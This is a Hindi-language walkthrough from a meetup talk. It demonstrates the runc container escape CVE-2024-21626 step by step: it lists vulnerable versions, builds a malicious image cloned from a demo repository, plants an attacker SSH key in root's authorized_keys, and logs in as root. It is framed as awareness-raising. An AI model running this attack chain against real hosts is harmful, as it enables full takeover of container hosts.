
CVE-2024-21626 कंटेनर एस्केप एक्सप्लॉइट का प्रदर्शन, जो दुर्भावनापूर्ण Docker इमेज के माध्यम से होस्ट रूट एक्सेस की अनुमति देता है, शैक्षिक उद्देश्यों के लिए चरण-दर-चरण हमले के परिदृश्य के साथ।
कंटेनर रनटाइम मीटअप #5 के LT के लिए डेमो।
सार्वजनिक जानकारी के अनुसार हमले के खतरे के बारे में जागरूकता बढ़ाने के उद्देश्य से, दुरुपयोग सख्त वर्जित है।
डेमो लैपटॉप के ssh_config में victim-server के रूप में पंजीकृत मशीन।
ssh victim-server
पीड़ित होने के लिए आवश्यक शर्तों के रूप में संस्करण जानकारी:
ubuntu@victim-server:$ docker --version
Docker version 20.10.25+dfsg1, build b82b9f3
ubuntu@victim-server:$ runc --version
runc version 1.1.10+ds1
commit: 1.1.10+ds1-1
spec: 1.1.0
go: go1.21.3
libseccomp: 2.5.4
इसी प्रकार
ssh attacker-server
ubuntu@victim-server:~$ git clone [email protected]:laysakura/CVE-2024-21626-demo.git
ubuntu@victim-server:~$ cd CVE-2024-21626-demo/
ubuntu@victim-server:~/CVE-2024-21626-demo$ docker build -t myimage .
ubuntu@victim-server:~/CVE-2024-21626-demo$ docker run -it myimage
/root/.ssh/authorized_keys हमलावर की सार्वजनिक कुंजी से बदल दिया गया हैमूल रूप से ऐसा इरादा नहीं है, इसलिए यहां कुछ नहीं किया जाता है, लेकिन स्थिति की पुष्टि के लिए कमांड दिखाया गया है।
ubuntu@victim-server:~$ sudo cat /root/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKPHHGSytV6bL1ryaEKE9XNWN23piXdzsI3Rzxe20IF6 ubuntu@attacker-server
attacker@attacker-server:~$ ssh -i .ssh/id_ed25519 root@victim-server
root@victim-server:~# id
uid=0(root) gid=0(root) groups=0(root)